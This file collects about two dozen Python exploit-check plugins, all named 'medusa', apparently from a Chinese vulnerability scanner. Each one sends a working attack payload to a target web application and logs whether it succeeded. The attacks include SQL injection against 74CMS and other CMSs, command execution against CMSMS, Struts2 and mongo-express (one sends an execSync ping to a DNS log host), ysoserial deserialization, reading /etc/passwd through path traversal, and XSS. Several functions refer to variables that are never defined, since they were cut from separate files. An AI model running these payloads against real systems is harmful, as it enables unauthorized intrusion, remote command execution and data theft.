def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('bbbmicrosoft') != -1: Medusa = "{}存在用友OA_cm_info_content_sqli存在sql注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4" data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1" payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "115", "Connection": "close", "Pragma": "no-cache", "Cache-Control": "no-cache" } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('''{"response":"Success","details":"}''') != -1 : Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text if con.lower().find('datapassword') != -1: Medusa = "{} 存在泛微数据库配置泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(1),3%23" payload2="/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(1),3%23" payload_url = scheme + "://" + url +":"+ str(port) + payload payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) con = resp.text con2 = resp2.text code = resp2.status_code code2 = resp2.status_code if (code==200 and con.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) or (code2==200 and con2.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) : Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) web=ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme+'://'+url+':'+str(port)+'/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd' headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', } s = requests.session() resp = s.get(payload_url, headers=headers,timeout=5, verify=False) con=resp.text con_hader=resp.headers code = resp.status_code if code== 500 and con.find('{"statusCode":500,"error":"Internal Server Error","message":"An internal server error occurred"}') != -1 and con_hader['kbn-name']=="kibana": Medusa = "{} 存在任意文件读取漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8')) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类 #medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/5clib/Inuseraction.action?actionkind=reg" payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('isIdCards()') != -1 and con.find( 'addressprompt') != -1: Medusa = "{}存在五车图书管理系统存在越权添加管理员漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload_url = scheme+"://"+url+':'+str(port)+'/user.action?'+payload host=url+':'+str(port) headers = { 'Host':host, 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent':RandomAgent, 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '571', 'DNT': '1', 'Upgrade-Insecure-Requests': '1' } try: s = requests.session() resp = s.get(payload_url,headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code==200 and con.lower().find('root')!=-1 and con.lower().find('/bin/bash')!=-1: Medusa = "{}存在Struts2远程代码执行漏洞 \r\n漏洞详情:\r\n影响版本:2_1_0-2_3_13\r\nPayload:{}\r\n".format(url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port for turl in urls: try: payload_url = scheme + "://" + url + ':' + str( port) + turl + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('active internet connections') != -1: Medusa = "{}存在用友OA_ICC系统框架漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/lib/filemanager/imagemanager/images.php?deld=../../" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('404') == -1 and con.find( 'Not Found') == -1 and con.find('未找到') == -1: Medusa = "{}存在CMSMS目录遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_common.php?act=hotword&query=%E4%BC%9A%E8%AE%A1%%27%20and%20w_hot%20like%20%27%1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("'会计%' and w_hot like '%1'") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect" + "%201,2,3,md5(7836457),5,6,7,8,9%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/checkValid" payload_url = scheme + "://" + url +":"+ str(port)+ payload dns=Dnslog() data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(dns.dns_host()) headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Authorization': 'Basic YWRtaW46cGFzcw==', 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '123' } s = requests.session() s.post(payload_url,data=data,headers=headers, timeout=6, verify=False) time.sleep(10) if dns.result(): Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(url,payload_url,data) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port for payload in payloads: try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code pattern = re.search( "[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}", con) if pattern: Medusa = "{} 存在用友a8 log泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns=Dnslog() YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar" subprocess.Popen(["java", "-jar", YsoserialPath, "CommonsCollections5", "ping "+dns.dns_host()], stdout=subprocess.PIPE) time.sleep(5) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(url,scheme + "://" + url +":"+ str(port),dns.dns_host(),dns.dns_text()) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("ca4238a0b923820dcc509a6f75849") != -1: Medusa = "{}存在大米CMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%281%29%20style=%22%22" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '" autofocus onfocus=alert(1) style=') != -1: Medusa = "{}存在74CMS存在反射型XSS漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.Low() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "42%20and%201=2" payload2="42%20and%201=1" payload_url = scheme + "://" + url +":"+ str(port) +"/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn¶137=1¶186=1¶138=1¶139=1¶140=1&id="+ payload payload_url2 = scheme + "://" + url + ":" + str( port) + "/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn¶137=1¶186=1¶138=1¶139=1¶140=1&id=" + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) con = resp.text con2 = resp2.text code = resp.status_code code2 = resp.status_code if code== 200 and code2== 200 and con.find('反馈已经被关闭') != -1 and con2.find('验证码错误') != -1 and con!=con2: Medusa = "{}存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}\r\n{}".format(url,payload_url,con,con2) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/search.php" payload_url = scheme + "://" + url +":"+ str(port) + payload payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': scheme+'://'+url, 'Referer':payload } resp = requests.post(payload_url, headers=headers, data=payload_data,proxies=proxies,timeout=5, verify=False) con=resp.text code = resp.status_code if code== 200 and con.find('System') != -1 and con.find('Compiler') != -1 and con.find('Build Date') != -1 and con.find('IPv6 Support') != -1 and con.find('Configure Command') != -1: Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8')) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload1 = "/available_seat.php?hid_Busid=2" payload2 = "/available_seat.php?hid_Busid=2 AND sleep(5)" payload_url1 = scheme + "://" + url +":"+ str(port)+ payload1 payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } start_time = time.time() resp = requests.get(payload_url1,headers=headers, timeout=6, verify=False) end_time_1 = time.time() resp2 = requests.get(payload_url2, headers=headers, timeout=6, verify=False) end_time_2 = time.time() delta1 = end_time_1 - start_time delta2 = end_time_2 - end_time_1 con = resp2.text if (delta2 - delta1) > 4: Medusa = "{}存在AdvancedBusBooking脚本SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url,payload_url2,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/5clib/kindaction.action" data = "filePath=&kind=music&curpage=1&actionName=&subkind=c:/windows&pagesize=20&curPage=1&toPage=1" payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('system.ini') != -1: Medusa = "{}存在五车图书管理系统存在任意文件遍历漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port for payload in payloads: try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.post(payload_url, data=post_data, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('a8 management monitor') != -1 and con.lower( ).find('connections stack trace') != -1: Medusa = "{} 存在用友OA_status存在默认密码漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format( url, payload_url, post_data) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = ClassCongregation.randoms().result(20) payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format( RD) payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1: Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),1,1))=97 as signed) %23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
